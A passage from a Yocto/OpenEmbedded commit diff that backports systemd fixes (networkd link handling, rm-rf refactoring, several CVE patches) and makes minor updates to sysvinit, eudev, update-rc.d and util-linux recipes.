+ return 0;
+ }
++
++static Link *link_drop_or_unref(Link *link) {
++ if (!link)
++ return NULL;
++ if (!link->manager)
++ return link_unref(link);
++ return link_drop(link);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
++
++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
++ _cleanup_(link_drop_or_unrefp) Link *link = NULL;
++ uint16_t type;
++ _cleanup_free_ char *ifname = NULL, *kind = NULL;
++ int r, ifindex;
++ unsigned short iftype;
++
++ assert(manager);
++ assert(message);
++ assert(ret);
++
++ r = sd_netlink_message_get_type(message, &type);
++ if (r < 0)
++ return r;
++ else if (type != RTM_NEWLINK)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
++ if (r < 0)
++ return r;
++ else if (ifindex <= 0)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_type(message, &iftype);
++ if (r < 0)
++ return r;
++
++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
++ if (r < 0)
++ return r;
++
++ /* check for link kind */
++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
++ if (r >= 0) {
++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
++ r = sd_netlink_message_exit_container(message);
++ if (r < 0)
++ return r;
++ }
++
++ link = new(Link, 1);
++ if (!link)
++ return -ENOMEM;
++
++ *link = (Link) {
++ .n_ref = 1,
++ .state = LINK_STATE_PENDING,
++ .ifindex = ifindex,
++ .iftype = iftype,
++ .ifname = TAKE_PTR(ifname),
++ .kind = TAKE_PTR(kind),
++
++ .n_dns = (unsigned) -1,
++ .dns_default_route = -1,
++ .llmnr = _RESOLVE_SUPPORT_INVALID,
++ .mdns = _RESOLVE_SUPPORT_INVALID,
++ .dnssec_mode = _DNSSEC_MODE_INVALID,
++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
++ };
++
++ r = hashmap_ensure_allocated(&manager->links, NULL);
++ if (r < 0)
++ return r;
++
++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
++ if (r < 0)
++ return r;
++
++ link->manager = manager;
++
++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
++ if (r < 0)
++ log_link_debug_errno(link, r, "New device has no master, continuing without");
++
++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
++ if (r < 0)
++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
++
++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ r = link_update_flags(link, message, false);
++ if (r < 0)
++ return r;
++
++ *ret = TAKE_PTR(link);
++
++ return 0;
++}
+
+ int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
+ _cleanup_(sd_device_unrefp) sd_device *device = NULL;
+
+--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530
++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530
+@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
+
+ int link_get(Manager *m, int ifindex, Link **ret);
+ int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
+-void link_drop(Link *link);
++Link *link_drop(Link *link);
+
+ int link_down(Link *link, link_netlink_message_handler_t callback);
+
+
diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
+From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:40:15 +0900
+Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
+
+link_detach_from_manager() is only called by link_drop(). It is not
+necessary to split such tiny function.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 27 ++++++++++++---------------
+ 1 file changed, 12 insertions(+), 15 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 9d30e16b0a..67d01ac44d 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
+-static void link_detach_from_manager(Link *link) {
+- if (!link || !link->manager)
+- return;
+-
+- link_unref(set_remove(link->manager->links_requesting_uuid, link));
+- link_clean(link);
+-
+- /* The following must be called at last. */
+- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
+-}
+-
+ void link_drop(Link *link) {
+- if (!link || link->state == LINK_STATE_LINGER)
++ if (!link)
+ return;
+
++ assert(link->manager);
++
+ link_set_state(link, LINK_STATE_LINGER);
+
++ /* Drop all references from other links and manager. Note that async netlink calls may have
++ * references to the link, and they will be dropped when we receive replies. */
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
+ link_drop_from_master(link, link->network->bond);
+ }
+
+- log_link_debug(link, "Link removed");
++ link_unref(set_remove(link->manager->links_requesting_uuid, link));
+
+ (void) unlink(link->state_file);
+- link_detach_from_manager(link);
++ link_clean(link);
++
++ /* The following must be called at last. */
++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
++ link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
+Backport of the following upstream commit:
+From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 5 Oct 2021 10:32:56 +0200
+Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 3 +++
+ src/basic/rm-rf.h | 1 +
+ 2 files changed, 4 insertions(+)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -161,6 +161,9 @@
+ ret = r;
+ }
+
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
++ ret = -errno;
++
+ return ret;
+ }
+
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -11,6 +11,7 @@
+ REMOVE_PHYSICAL = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
+ REMOVE_SUBVOLUME = 1 << 3, /* Drop btrfs subvolumes in the tree too */
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
++ REMOVE_SYNCFS = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
+ } RemoveFlags;
+
+ int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
+Backport of the following upstream commit:
+From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 26 Jan 2021 16:30:06 +0100
+Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
+ iteration loop
+
+This splits out rm_rf_children_inner() as body of the loop. We can use
+that to implement rm_rf_child() for deleting one specific entry in a
+directory.
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
+ src/basic/rm-rf.h | 3 +-
+ 2 files changed, 131 insertions(+), 95 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -19,138 +19,153 @@
+ #include "stat-util.h"
+ #include "string-util.h"
+
++/* We treat tmpfs/ramfs + cgroupfs as non-physical file sytems. cgroupfs is similar to tmpfs in a way after
++ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
++ * those again. */
+ static bool is_physical_fs(const struct statfs *sfs) {
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
++static int rm_rf_children_inner(
++ int fd,
++ const char *fname,
++ int is_dir,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
++ struct stat st;
++ int r;
++
++ assert(fd >= 0);
++ assert(fname);
++
++ if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
++
++ r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
++ if (r < 0)
++ return r;
++
++ is_dir = S_ISDIR(st.st_mode);
++ }
++
++ if (is_dir) {
++ _cleanup_close_ int subdir_fd = -1;
++ int q;
++
++ /* if root_dev is set, remove subdirectories only if device is same */
++ if (root_dev && st.st_dev != root_dev->st_dev)
++ return 0;
++
++ /* Stop at mount points */
++ r = fd_is_mount_point(fd, fname, 0);
++ if (r < 0)
++ return r;
++ if (r > 0)
++ return 0;
++
++ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
++
++ /* This could be a subvolume, try to remove it */
++
++ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
++ if (r < 0) {
++ if (!IN_SET(r, -ENOTTY, -EINVAL))
++ return r;
++
++ /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
++ } else
++ /* It was a subvolume, done. */
++ return 1;
++ }
++
++ subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (subdir_fd < 0)
++ return -errno;
++
++ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
++ * again for each directory */
++ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++
++ r = unlinkat(fd, fname, AT_REMOVEDIR);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++
++ return 1;
++
++ } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
++ r = unlinkat(fd, fname, 0);
++ if (r < 0)
++ return r;
++
++ return 1;
++ }
++
++ return 0;
++}
++
++int rm_rf_children(
++ int fd,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
+ _cleanup_closedir_ DIR *d = NULL;
+ struct dirent *de;
+ int ret = 0, r;
+- struct statfs sfs;
+
+ assert(fd >= 0);
+
+ /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure.. */
++ * fd, in all cases, including on failure. */
++
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
+
+ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
+
+- r = fstatfs(fd, &sfs);
+- if (r < 0) {
+- safe_close(fd);
++ if (fstatfs(dirfd(d), &sfs) < 0)
+ return -errno;
+ }
+
+ if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call,
+- * unless explicitly requested. This is extra paranoia just
+- * to be sure we never ever remove non-state data. */
++ /* We refuse to clean physical file systems with this call, unless explicitly
++ * requested. This is extra paranoia just to be sure we never ever remove non-state
++ * data. */
++
+ _cleanup_free_ char *path = NULL;
+
+ (void) fd_get_path(fd, &path);
+- log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+-
+- safe_close(fd);
+- return -EPERM;
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
+ }
+ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return errno == ENOENT ? 0 : -errno;
+- }
+-
+ FOREACH_DIRENT_ALL(de, d, return -errno) {
+- bool is_dir;
+- struct stat st;
++ int is_dir;
+
+ if (dot_or_dot_dot(de->d_name))
+ continue;
+
+- if (de->d_type == DT_UNKNOWN ||
+- (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
+- if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- is_dir = S_ISDIR(st.st_mode);
+- } else
+- is_dir = de->d_type == DT_DIR;
+-
+- if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
+- if (root_dev && st.st_dev != root_dev->st_dev)
+- continue;
+-
+- subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (subdir_fd < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- /* Stop at mount points */
+- r = fd_is_mount_point(fd, de->d_name, 0);
+- if (r < 0) {
+- if (ret == 0 && r != -ENOENT)
+- ret = r;
+-
+- continue;
+- }
+- if (r > 0)
+- continue;
+-
+- if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+- /* This could be a subvolume, try to remove it */
+-
+- r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+- if (r < 0) {
+- if (!IN_SET(r, -ENOTTY, -EINVAL)) {
+- if (ret == 0)
+- ret = r;
+-
+- continue;
+- }
+-
+- /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
+- } else
+- /* It was a subvolume, continue. */
+- continue;
+- }
+-
+- /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
+- * system type again for each directory */
+- r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+- if (r < 0 && ret == 0)
+- ret = r;
+-
+- if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-
+- if (unlinkat(fd, de->d_name, 0) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+- }
++ is_dir =
++ de->d_type == DT_UNKNOWN ? -1 :
++ de->d_type == DT_DIR;
++
++ r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
+ }
++
+ return ret;
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+ int fd, r;
+- struct statfs s;
+
+ assert(path);
+
+@@ -195,9 +210,10 @@
+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
+
+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
++
+ if (statfs(path, &s) < 0)
+ return -errno;
+-
+ if (is_physical_fs(&s))
+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
+@@ -225,3 +241,22 @@
+
+ return r;
+ }
++
++int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
++
++ /* Removes one specific child of the specified directory */
++
++ if (fd < 0)
++ return -EBADF;
++
++ if (!filename_is_valid(name))
++ return -EINVAL;
++
++ if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
++ return -EINVAL;
++
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
++ return -EINVAL;
++
++ return rm_rf_children_inner(fd, name, -1, flags, NULL);
++}
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -13,7 +13,8 @@
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
+ } RemoveFlags;
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
++int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
++int rm_rf_child(int fd, const char *name, RemoveFlags flags);
+ int rm_rf(const char *path, RemoveFlags flags);
+
+ /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */
diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
+# Systemd expect a color capable pager, however the less provided
+# by busybox is not. This make many interaction with systemd pretty
+# annoying. As a workaround we disable the systemd pager if less
+# is not the GNU version.
+if ! less -V > /dev/null 2>&1 ; then
+ export SYSTEMD_PAGER=
+fi
diff --git a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch b/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
deleted file mode 100644
index 27b2b60fad..0000000000
--- a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 0335d110afc08baf47d76b7011ce02510dfdd524 Mon Sep 17 00:00:00 2001
-From: Valery0xff <valery.chernous@gmail.com>
-Date: Wed, 11 Mar 2020 02:20:36 +0200
-Subject: [PATCH] udev: fix SECLABEL{selinux} issue (#15064)
-
-Add SECLABEL{selinux}="some value" cause udevadm crash
-systemd-udevd[x]: Worker [x] terminated by signal 11 (SEGV)
-
-It happens since 25de7aa7b90 (Yu Watanabe 2019-04-25 01:21:11 +0200)
-when udev rules processing changed to token model. Yu forgot store
-attr to SECLABEL token so fix it.
----
- src/udev/udev-rules.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-Upstream-Status: Backport [https://github.com/systemd/systemd/commit/0335d110afc08baf47d76b7011ce02510dfdd524.patch]
----
-diff --git a/src/udev/udev-rules.c b/src/udev/udev-rules.c
-index b9b350d1ef..b990f68e93 100644
---- a/src/udev/udev-rules.c
-+++ b/src/udev/udev-rules.c
-@@ -921,7 +921,7 @@ static int parse_token(UdevRules *rules, const char *key, char *attr, UdevRuleOp
- op = OP_ASSIGN;
- }
-
-- r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, NULL);
-+ r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, attr);
- } else if (streq(key, "RUN")) {
- if (is_match || op == OP_REMOVE)
- return log_token_invalid_op(rules, key);
diff --git a/meta/recipes-core/systemd/systemd_244.3.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 64e3b18333..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.3.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,10 +18,28 @@ SRC_URI += "file://touchscreen.rules \
file://00-create-volatile.conf \
file://init \
file://99-default.preset \
+ file://systemd-pager.sh \
file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
file://0003-implment-systemd-sysv-install-for-OE.patch \
- file://CVE-2020-13776.patch \
- file://systemd-udev-seclabel-options-crash-fix.patch \
+ file://CVE-2021-33910.patch \
+ file://CVE-2020-13529.patch \
+ file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
+ file://introduce-ordered_set_clear-free-with-destructor.patch \
+ file://network-add-skeleton-of-request-queue.patch \
+ file://network-merge-link_drop-and-link_detach_from_manager.patch \
+ file://network-also-drop-requests-when-link-enters-linger-state.patch \
+ file://network-fix-Link-reference-counter-issue.patch \
+ file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
+ file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
+ file://CVE-2018-21029.patch \
+ file://CVE-2021-3997-1.patch \
+ file://CVE-2021-3997-2.patch \
+ file://CVE-2021-3997-3.patch \
+ file://CVE-2022-3821.patch \
+ file://CVE-2023-26604-1.patch \
+ file://CVE-2023-26604-2.patch \
+ file://CVE-2023-26604-3.patch \
+ file://CVE-2023-26604-4.patch \
"
# patches needed by musl
@@ -51,6 +69,9 @@ SRC_URI_MUSL = "\
file://0004-src-shared-cpu-set-util.h-add-__cpu_mask-definition.patch \
"
+# already applied in 244.5
+CVE_CHECK_WHITELIST += "CVE-2020-13776"
+
PAM_PLUGINS = " \
pam-plugin-unix \
pam-plugin-loginuid \
@@ -87,6 +108,7 @@ PACKAGECONFIG ??= " \
timesyncd \
utmp \
vconsole \
+ wheel-group \
xz \
"
@@ -147,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
+PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -179,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
+PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
# Verify keymaps on locale change
PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -196,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
EXTRA_OEMESON += "-Dlink-udev-shared=false"
EXTRA_OEMESON += "-Dnobody-user=nobody \
- -Dnobody-group=nobody \
+ -Dnobody-group=nogroup \
-Drootlibdir=${rootlibdir} \
-Drootprefix=${rootprefix} \
-Ddefault-locale=C \
+ -Dsystem-uid-max=999 \
+ -Dsystem-gid-max=999 \
"
# Hardcode target binary paths to avoid using paths from sysroot
@@ -297,6 +323,9 @@ do_install() {
# install default policy for presets
# https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
+
+ # add a profile fragment to disable systemd pager with busybox less
+ install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
}
python populate_packages_prepend (){
@@ -384,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
${rootlibexecdir}/systemd/systemd-binfmt \
${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
${systemd_unitdir}/system/systemd-binfmt.service"
-RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc"
+RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
-RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps"
+RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -519,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
${sysconfdir}/dbus-1/ \
${sysconfdir}/modules-load.d/ \
${sysconfdir}/pam.d/ \
+ ${sysconfdir}/profile.d/ \
${sysconfdir}/sysctl.d/ \
${sysconfdir}/systemd/ \
${sysconfdir}/tmpfiles.d/ \
diff --git a/meta/recipes-core/sysvinit/sysvinit/rc b/meta/recipes-core/sysvinit/sysvinit/rc
index fd1fdd26ba..d0d3149821 100755
--- a/meta/recipes-core/sysvinit/sysvinit/rc
+++ b/meta/recipes-core/sysvinit/sysvinit/rc
@@ -63,7 +63,7 @@ startup() {
stty onlcr 0>&1
# Limit stack size for startup scripts
- [ "$STACK_SIZE" == "" ] || ulimit -S -s $STACK_SIZE
+ [ "$STACK_SIZE" = "" ] || ulimit -S -s $STACK_SIZE
# Now find out what the current and what the previous runlevel are.
diff --git a/meta/recipes-core/udev/eudev/init b/meta/recipes-core/udev/eudev/init
index 0455ade258..c60dbbf6d5 100644
--- a/meta/recipes-core/udev/eudev/init
+++ b/meta/recipes-core/udev/eudev/init
@@ -52,7 +52,7 @@ case "$1" in
kill_udevd > "/dev/null" 2>&1
# trigger the sorted events
- [ -e /proc/sys/kernel/hotplug ] && echo -e '\000' >/proc/sys/kernel/hotplug
+ [ -e /proc/sys/kernel/hotplug ] && printf '\0\n' >/proc/sys/kernel/hotplug
@UDEVD@ -d
udevadm control --env=STARTUP=1
diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "eudev is a fork of systemd's udev"
HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
+DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
LICENSE = "GPLv2.0+ & LGPL-2.1+"
LICENSE_libudev = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
continue
pkg = os.path.basename(os.readlink(file))
- extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1)
+ extras.setdefault(pkg, [])
+ extras[pkg].append(file.replace(dvar, '', 1))
pn = d.getVar('PN')
for pkg, links in extras.items():
of = d.getVar('FILES_' + pn + '-' + pkg)
- links = of + links
+ links = of + " " + " ".join(sorted(links))
d.setVar('FILES_' + pn + '-' + pkg, links)
}
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
\
--disable-bfs --disable-chfn-chsh --disable-login \
--disable-makeinstall-chown --disable-minix --disable-newgrp \
- --disable-use-tty-group --disable-vipw \
+ --disable-use-tty-group --disable-vipw --disable-raw \
\
--without-udev \
\
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
